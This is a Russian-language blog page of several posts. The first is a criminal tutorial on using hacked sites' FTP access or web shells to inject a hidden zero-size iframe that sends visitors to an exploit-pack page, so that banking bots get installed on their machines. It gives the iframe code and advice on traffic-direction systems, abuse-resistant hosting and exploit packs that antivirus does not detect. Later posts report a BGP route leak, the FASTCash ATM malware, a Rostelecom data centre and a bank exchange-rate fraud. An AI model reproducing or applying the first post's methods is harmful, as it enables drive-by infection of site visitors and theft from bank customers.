Блог

  • Кому и зачем нужен iFrame трафик и причём тут дроповоды и обнал

    Кому и зачем нужен iFrame трафик и причём тут дроповоды и обнал



    Трафик — на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф — это смешаный трафик нескольких стран стразу.
    как конвертировать трафик в просмотры AdSense
    Для чего нужен трафик?
    В своей основе iFrame трафик реальные дроповоды используют в своих схемах для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

    Где взять трафик?
    Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок…

    Чтобы иметь трафик дроповодам darkmoney нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме — это самый надёжный вариант.

    Для чего мне нужны FTP и Shell и что мне с ними делать?
    iFrame — это код HTML внутри страницы. С помощью iFrame дроповод darkmoney может вставлять один HTML документ в другой! Проще говоря, iFrame — это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

    Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
    Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:

    <iframe src=»http://site.ru/sploit.php» width=»0″ height=»0″ frameborder=»0″></iframe>

    где:

    http://site.ru/sploit.php — это сайт на который пользователи site.ru будут заходить одновременно
    width=»0″ длина равна 0
    height=»0″ высота равна 0
    frameborder=»0″ граница фрейма равна 0

    Что делать с Iframe?
    Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

    Что нужно для продажи трафика?
    Есть такая штука, как TDS — Traffic Direct System, — это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

    Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

    В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
    Ну вот и всё, теперь поговорим про загрузки.

    Что же такое эти загрузки?
    Загрузки — это загрузка и запуск файла на компьютере клиента банка или простого лоха, — один из самых распространённых методов распространения банковских ботов в сети Интернет.

    Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов…

    Загрузки — это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

    Что нам нужно для того чтобы делать загрузки?
    Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

    Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

    Теперь про связку сплоитов
    Exploit — это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
    А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

    Что же такое пробив связки?
    Пробив — это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился — тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

    Как делать загрузки?
    Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site.com/svjzka.php — значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

  • Как угнать IP трафик Google при помощи BGP

    Как угнать IP трафик Google при помощи BGP

    В минувший понедельник многие службы Google оказались недоступны для некоторых пользователей интернета. Причина – очередная утечка маршрутов BGP, из-за которой трафик перенаправлялся через Россию, Китай и Нигерию. Чем именно был вызван инцидент, проблемами с конфигурацией или кибератакой, пока непонятно.

    Протокол Border Gateway Protocol (BGP) предназначен для управления глобальными маршрутами передачи данных через сеть интернет. Перехват BGP сессий и утечка BGP маршрутов возникают, когда преднамеренно или случайно происходит захват или префиксов групп IP-адресов путем повреждения таблиц маршрутизации, хранящих путь к заданной сети определённого маршрутизатора, как правило одного из крупных транзитных провайдеров сети интернет.

    По данным компании ThousandEyes, специализирующейся на мониторинге сети, утечка маршрутов BGP произошла в понедельник, когда трафик, предназначавшийся для Google Search, G-Suite и различных других служб Google Cloud, был перенаправлен через российскую компанию «ТрансТелеком» AS20485, нигерийского интернет-провайдера MainOne AS37282 и китайскую государственную компанию China Telecom AS4809.

    Подозрительное обновление маршрута к сети 216.58.192.0/19 показывающее наилучший маршрут к Google через Россию, Китай и Нигерию

    Как сообщили эксперты из BGPmon, инцидент затронул 212 уникальных BGP префиксов Google.

    «По результатам проведенного нами анализа, источником утечки является межсетевое взаимодействие между нигерийским провайдером MainOne и китайской China Telecom. Межсетевое взаимодействие между MainOne и Google в штатном режиме осуществляется через нигерийскую точку обмена интернет-трафиком в Лагосе и имеет прямые маршруты к Google, которые утекли к China Telecom при помощи изменения в таблице маршрутизации BGP нигерийского провайдера», – пояснили в ThousandEyes.

    Как уже ранее сообщалось нами, китайская государственная интернет компания China Telecom была неоднократно уличена в систематическом перехвате интернет-трафика с целью хищения интеллектуальной собственности.

    Кроме того, с недавних пор изменение таблиц маршрутизации крупных транзитных интернет провайдеров с целью угона IP трафика определённой компании и дальнейшего его перехвата, стало возможным довольно широкому кругу лиц благодаря использованию программного обеспечения под названием LOKI 0.2.7, скомпилированного на языке Python для платформы Windows x64.   

  • Сналить деньги из банкомата можно даже при нулевом балансе с помощью банковского бота FASTCash

    Сналить деньги из банкомата можно даже при нулевом балансе с помощью банковского бота FASTCash

    SAP — один из основных элементов инфраструктуры банкоматов и терминалов PoS, он устанавливает соединение с основной банковской системой для валидации пользователя, чтобы можно было произвести транзакцию.

    схема кражи денег из банкоматов

    Мы проанализировали десять образцов банковских ботов, связанной с FASTCash, и обнаружили, что нарушители удаленно атаковали серверы переключения приложений (Switch Application Servers, SAP) нескольких банков. Каждый раз при использовании банкомата или терминала PoS в магазине, ПО обращается к SAP для валидации пользователя. В зависимости от того, доступна ли сумма на счету, транзакция может пройти или не пройти.

    В результате появилась более подробная информация о схеме безлимитного снятия денег из банкоматов, которой успешно пользуется северокорейская хакерская группа Hidden Cobra. Техническую информацию опубликовала команда US-CERT, подразделение Министерства внутренней безопасности США. Речь об атаке, названной FASTCash, северокорейская хак-группа использует ее еще с 2016 года.

    Банковский бот, установленный на серверы SAP, перехватывает запрос на транзакцию с платежной картой дропа с минимальным или даже нулевым балансом и передает поддельный положительный ответ, без собственно обращения к банковской системе для валидации доступного баланса. Таким образом, банкомат выдает наличные дропу, даже не уведомив р выдаче банк. По оценке доверенных источников, за два с лишним года группе Hidden Cobra удалось обналичить уже десятки миллионов долларов.

    Пока неизвестно, как произошло изначальное заражение банков ботом FASTCash, но власти США предполагают целевой фишинг: вероятно, исполняемый файл рассылали сотрудникам банков по электронной почте. Банковский бот заражал компьютер сотрудника, давая нарушителю доступ во внутреннюю сеть банка, где он разворачивал банковского бота в подсистеме SAP.

    Атаке FASTCash подверглись банки в Азии, Африке и, возможно, США. US-CERT рекомендует банкам использовать двухфакторную аутентификацию пользователей для доступа к серверам SAP и другие меры предосторожности. Также можно скачать индикаторы компрометации (IOS) для защиты от действий Hidden Cobra.

    Группировка Hidden Cobra также известна как Lazarus Group или Guardians of Peace. Она якобы пользуется поддержкой правительства Северной Кореи. Hidden Cobra известна многочисленными атаками на организации, связанные с медиа, аэрокосмической отраслью и финансами и государственные структуры по всему миру. Ранее Hidden Cobra связывали с шифровальщиком WannaCry и атаками в том числе на Sony Pictures в 2014 и банковскую систему SWIFT в 2016 году.

  • Как я работал в дата центре «Ростелеком» в Адлере

    Как я работал в дата центре «Ростелеком» в Адлере

    Российский телекоммуникационный оператор «Ростелеком» был назначен генеральным  партнером XXII Олимпийских зимних игр 2014 года в Сочи в категории «Телекоммуникации», а компания Avaya — являлась официальным поставщиком Оргкомитета «Сочи 2014» в категории «Телекоммуникационное оборудование».

    В сентябре 2012 года «Ростелеком» объявил об открытии на улице Ленина, 2 в Адлерском районе Сочи специализированной площадки, которая в дальнейшем использовалась для формирования и обслуживания всех информационных и телекоммуникационных систем XXII Олимпийских зимних игр 2014 года. Центр обработки данных разместили в здании бывшего районного узла связи. Все работы рекордными темпами были проведены за 10 месяцев.

    вход в ЦОД Ростелеком со стороны ул Кирова • Адлер

    Это самый крупный объект IT-инфраструктуры Олимпийских игр в Адлере и Сочи. Его общая площадь превышает 2000 кв. метров. В нем разместился целый ряд специализированных служб: центр обработки данных, основной центр телекоммуникаций, центр управления технологиями (TOC), центр управления сетью (NOC), служба технической поддержки (Service Desk, центр обработки вызовов), учебный центр и тестовая лаборатория для интеграции и тестирования информационных систем, которые затем отправлялись для развертывания на других площадках Олимпиады 2014.

    Отказоустойчивое функционирование ключевых информационных систем оргкомитета в Москве и Сочи обеспечивал также московский Центр Обработки Данных «Ростелекома», и каждый олимпийский объект был подключен к резервируемой сети достаточной емкости.
    Адлерский Центр Обработки Данных — одна из важнейших площадок, которая обслуживала телекоммуникационные и вычислительные потребности Олимпиады 2014 года. После завершения Олимпийских игр её планировали использовать для муниципальных проектов и для нужд учебного центра «Ростелекома».

    Серверы дата центра Ростелеком в Адлере

    В настоящее время центр обработки данных расположен в двух помещениях общей площадью 400 кв. метров и включает около сотни стоек для размещения серверов, сетевого и телекоммуникационного оборудования, оснащенный модулями резервного питания комплекс электроснабжения проектной мощностью 2 МВт, систему кондиционирования, пожаротушения и обеспечения безопасности. В системах охлаждения Центра Обработки Данных применяются чиллеры.

    укладка кабелей в дата центре Ростелеком в Адлере

    Инженерно-техническая инфраструктура объекта включает структурированную кабельную систему Panduit с подсистемами на «витой паре» и волоконно-оптическом кабеле.

    серверы HP с водяным охлаждением в дата центре Ростелеком в Адлере

    Серверные стойки с закупленными ранее «Ростелекомом» серверами HP. В наиболее высоконагруженных стойках используется водяное охлаждение.

    Ростелеком использует маршрутизирующие коммутаторы Avaya Virtual Services Platform 9000 в Адлере

    В Адлерском Центре Обработки Данных развернуты маршрутизирующие коммутаторы Avaya Virtual Services Platform (VSP) 9000 (внизу). Это решение нового поколения для критически важных центров обработки данных и базовых сетей комплексов зданий, ориентированное на удовлетворение потребностей крупных предприятий и операторов.

    Отказоустойчивые коммутаторы VSP 9000 с производительностью 27 Тбит/с (в кластерной конфигурации – более 100 Тбит/с), содержащие в одном шасси до 240 10-гигабитных портов, обслуживают ядро локальной олимпийской сети. VSP 9000 позволяет выстраивать динамические Центр Обработки Данных с гибкой инфраструктурой виртуальных сетей, обеспечивает бесперебойный доступ к приложениям и услугам, упрощает работу сети и способствует сокращению затрат на развертывание новых услуг.

    Avaya Communication Manager используется в дата центре Ростелеком • Алер

    Оборудование Avaya Aura обеспечивает работу приложений Avaya Communication Manager, системы Session Manager, Программное Обеспечение управления инфраструктурой System Mаnager. В состав комплекса унифицированных коммуникаций входят также медиaшлюзы Avaya G450, IP-телефоны, клиенты Flare Experience, пакет Contact Center Elite. Шлюз Avaya G450 — защищенная платформа для приложений IP-телефонии на базе Avaya Communication Manager. Как и другие медиа шлюзы Avaya, шлюз G450 может распространить функциональность и приложения Communication Manager на удаленные площадки. Шасси имеет восемь разъемов для медиа-модулей с интерфейсами подключения к T1/E1, ISDN-BRI, ГВС, линиям цифровой и аналоговой телефонии и аналоговым транкам.

    В помещениях Центра Обработки Данных установлена система газового пожаротушения. По всему периметру помещения зала проложены трубы для подачи газа, соединенные с газовыми баллонами. В данной системе используется инертный газ, который не токсичен, безопасен для человека и не дорог при перезарядке баллонов.

    Аккумуляторные батареи — важное звено системы электропитания Центра Обработки Данных. Стандарт TIA-942 рекомендует применение в центрах обработки данных герметичных необслуживаемых аккумуляторов, изготовленных по технологии VLRA (свинцово-кислотных герметизированных батарей с регулирующими клапанами).

    Источник Бесперебойного Питания компании Emerson Network Power общей мощностью 1,6 МВт сможет обеспечить работу всего Центра Обработки Данных в течение 30 минут. Этого времени достаточно для поддержания работы центра обработки данных при непродолжительных перебоях в электроснабжении и запуска дизель-генераторов. Кроме оборудования ИТ ИБП питают также циркуляционные насосы, обеспечивающие работу системы охлаждения и кондиционирования за счет накопительного бака с водой.

    Центр управления технологиями, расположившийся над помещениями Центра Обработки Данных, во время проведения Олимпийских игр работал круглосуточно, обеспечивая разрешение всех инцидентов в сети и оперативное устранение неисправностей.

    Центр управления технологиями Ростелеком • Адлер
  • Дроповод с процессинга фиата заработал 400.000 USD на обменном курсе

    Дроповод с процессинга фиата заработал 400.000 USD на обменном курсе

    Кибернегодяи смогли внести изменения в онлайн-систему частного банка Коста-Рики, чтобы покупать и продавать доллары по фантастическому курсу. Таким образом, в течение четырех месяцев дроповоды смогли сделать денежных переводов более чем на 200 миллионов колонов (400 000 долларов США).
    Франциско Сегура, возглавляющий расследование, объяснил, что дроповод, который также имел счет в этом банке, смог изменить обменный курс и переводил «заработанные» деньги на счета своих неразводных дропов, которые были в курсе этой темы, и впоследствии, чтобы избежать обнаружения, выводили деньги со счетов небольшими суммами через банкоматы сторонних банков.

    Дроповод процессинга фиата сделал перевод на $400.000

    Летиция Аргедас, менеджер Колумбийского банка Davivienda пояснил, что дроповод мог менять обменный курс с 493 до 4 930 000 колонов за один доллар и обменял таким образом 1 колон на $10 000. Используя этот метод дроповод смог перевести из банка миллионы колонов на счета своих дропов всего за несколько операций.
    По информации банка Davidienda, нарушение безопасности произошло в период между августом и ноябрем 2012 года. Этот случай был единичным и ни один из счетов клиентов банка не пострадал.
    Полиция задержала главного дроповода — 25-летнего Лопеза и его нескольких денежных мулов.